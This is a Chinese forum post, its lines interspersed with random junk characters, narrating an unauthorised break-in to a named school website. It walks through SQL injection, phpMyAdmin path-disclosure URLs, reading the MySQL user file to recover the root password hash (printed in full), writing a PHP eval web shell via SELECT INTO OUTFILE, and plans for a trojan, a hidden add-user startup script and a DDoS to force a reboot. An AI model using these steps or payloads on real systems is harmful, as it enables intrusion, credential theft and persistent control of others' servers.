第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
# n' O! W2 N% Y发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
- U, x3 w) w" k3 a8 P: U% g5 B6 j3 H# N; J* W
/ ?( [. y: \* T2 ~; M. j2 O; g
; D: T+ j4 x% u* w ?# D, C常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
) {7 f4 b: T3 T6 d* S: R) v3 j3 R) Y& b# H
那么想可以直接写入shell ,getshell有几个条件:
- j4 j' y: _6 ?- |5 @1 k5 {( J, b1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ( x% s9 |1 g9 Q6 h
7 [ W7 E6 m, X2 V) o试着爆绝对路径:
2 b( _ [3 J' P" M3 P0 e8 t% ~9 R1./phpMyAdmin/index.php?lang[]=1
1 R, \* r8 c& c2./phpMyAdmin/phpinfo.php
7 ?5 h- o! Z3 U$ n3./load_file()
! ?! n9 m3 ^. q5 n4./phpmyadmin/themes/darkblue_orange/layout.inc.php 3 S5 f% P! |( ~& C
5./phpmyadmin/libraries/select_lang.lib.php ( b/ [4 ~3 d |' H2 n3 U5 W
6./phpmyadmin/libraries/lect_lang.lib.php 5 A3 i6 k7 k; c- |+ Y9 I J
7./phpmyadmin/libraries/mcrypt.lib.php
9 K5 `8 J6 J& C) j8./phpmyadmin/libraries/export/xls.php
: Y! q$ c" M/ m1 h
% f7 D' ^! }3 F! m+ w, S8 u9 j均不行........................... % a. h9 Z& E( S, d; n
. {, {3 k& ?9 |3 S- ~
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 2 I F; r8 a. V
" [" X9 x! v6 k" F权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
) D3 |! ?& w/ @7 Q( a" O3 ~* V$ n. Q; s, x" J8 E: q) X
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
; x( Y% u* u c5 [
9 Y+ `7 \8 h- `) `7 c敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... & Q7 a$ I6 d5 z4 W* k- o
) @% V" h2 |; M& c- Y, z3 \7 T4 @想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ) q; Z. k9 q" s, ~- r, s% R9 k
( e, D+ ~+ e K) J6 l- ]http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
* \; x1 W& R; y5 o$ u
; r2 Q- F+ ?, d$ M+ M+ d7 J- H自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
0 _) U4 b L3 ]* T& d# I3 I4 \+ S4 H" N. R, h7 ]5 _
成功读到root密码:
! ^! `5 }/ F- b' W( p. }% S# J0 ]1 q" H# @
17---- r(0072)
4 |8 w9 A8 j1 i& G x18---- o(006f) 2 |0 l6 ?5 `8 I1 R+ ]! m
19---- o(006f) , x, Q @2 \' i4 S5 ` p
20---- t(0074)
. ]/ y% U3 {1 |; e21---- *(002a)
o3 g6 ]) ]. x) Q6 H6 r22---- 8(0038)
9 n% T# _# ?( ]23---- 2(0032) : t, v9 ?: v9 B/ s, g
24---- E(0045)
* c* R+ H( _* ~25---- 1(0031) 7 C+ S% e. U* h0 L+ F6 M( H2 N* f
26---- C(0043) 1 t" J' ~+ G$ X% u0 z6 G- _+ ?
27---- 5(0035)
: b# G2 _& F7 q$ v/ x, @28---- 8(0038)
4 C6 Z. i: a# Y. w29---- 2(0032)
, s( m) s, A8 z, Q30---- 8(0038)
+ S- Q% @+ f) q2 O31---- A(0041)
7 [/ k# D" A/ ^& L" W9 G+ ~32---- 9(0039)
( d& S8 e: O8 _7 R% C0 K% V: S33---- B(0042)
3 o1 {! u8 p) K4 r34---- 5(0035) / Z% r' L- M: @% g2 t( s( K3 ?
35---- 4(0034)
+ l6 Q/ s9 d! t& b4 ]7 `36---- 8(0038)
6 w- o) d- Q" }- \37---- 6(0036) % P' y9 q$ ^' Q# p+ z9 `
38---- 4(0034)
3 Z4 p- ~) ] }! ~; G39---- 9(0039)
% F3 f0 P4 Q1 ]; F T40---- 1(0031)
! K$ A5 [: V: |1 P41---- 1(0031) 2 z5 P+ ~& J& n
42---- 5(0035) 6 k1 H- {2 T+ t4 _! L- d
43---- 3(0033) 2 i0 Q" |9 O8 B- s0 `
44---- 5(0035) ; u R1 }1 R9 H
45---- 9(0039)
: V. @' Q: G4 }4 r46---- 8(0038) # w7 Z2 j! T% }+ Z: | |
47---- F(0046) ! c) Z3 s8 @' t; v
48---- F(0046)
( C+ p$ }8 M% W# @; w) W49---- 4(0034) . U [0 B! }' x6 T* r. I* n
50---- F(0046)
7 O8 W6 s- v2 r* T; j2 L51---- 0(0030) : `4 a6 F8 J: p
52---- 3(0033)
8 D9 R* f7 o5 a' g53---- 2(0032) 4 m- |$ B( J' Y. Y2 n G
54---- A(0041) & T- q- R* Y4 @3 M# G0 k# {
55---- 4(0034)
: X1 q2 j7 s/ ]8 W/ S# i56---- A(0041) * G' \! ?: }0 t7 Q6 S
57---- B(0042)
7 [1 f8 ~8 ?2 t; H- H$ Z58---- *(0044) 2 W- r! D! b6 x4 p* s
59---- *(0035) ! z" j0 k! o4 \& n7 @4 e; ]' R) Z0 _
60---- *(0041)
4 \9 Q* y* S; \2 o$ u5 U61---- *0032)
0 k y8 Q* K0 c$ ?
5 L: {/ D* B& _! z3 t解密后成功登陆phpmyamin + R4 J4 e) q! @8 E% ~; c- v# E
8 `6 w& [8 A2 r' g3 Z8 d$ M; _7 x- j- |+ ?1 t+ t8 R' ?7 ~
% ?0 E) N5 S$ }# I9 k
- G1 | h- A3 m1 ], p* g
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' # w r5 h# }$ U5 h( c# K
$ [4 s5 S* E) `3 |9 r6 x# k8 G成功执行,拿下shell,菜刀连接:
) M; a" y* {3 }
; v0 A. t4 @; t. Y. y服务器不支持asp,aspx,php提权无果................... 3 ]% N9 ]' H' t: o
8 y5 ^. ~ ~+ M但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: , m7 ?- m3 e1 d
服务器上已经有个隐藏帐号了
# n, ~/ o) P1 p别名 administrators( e3 M& ]8 @! d9 C
注释 管理员对计算机/域有不受限制的完全访问权 / p/ m8 n7 @, j% A7 h, i6 s9 \8 ~
成员 , @5 c5 y) c) r6 o' Y) S% O* `
-------------------------------------------------------------------------------4 G' g4 `1 Y' c, b S
admin
, ]& q7 d& H5 @Administrator
5 C4 n* G8 a& J3 ?. M. Islipper$( F' q1 i3 W- r! J! n# V! R2 [
sqluser
% O: r! M7 ^" \! Z& a命令成功完成。
V; T9 s( s9 d( p5 W Y
% F2 S' _ |+ M" O服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。 Y4 T, P) B v7 U& K j! t
+ z2 @: [8 g0 B% `) K: j9 O, iddos服务器重启,不然就只能坐等服务器重启了...............................
' |( G- {2 H5 {" A8 x' K4 [; t6 m, R9 x( A8 b3 N' k7 ]; k) G
. c- K0 z% e' c# Z3 R0 t
|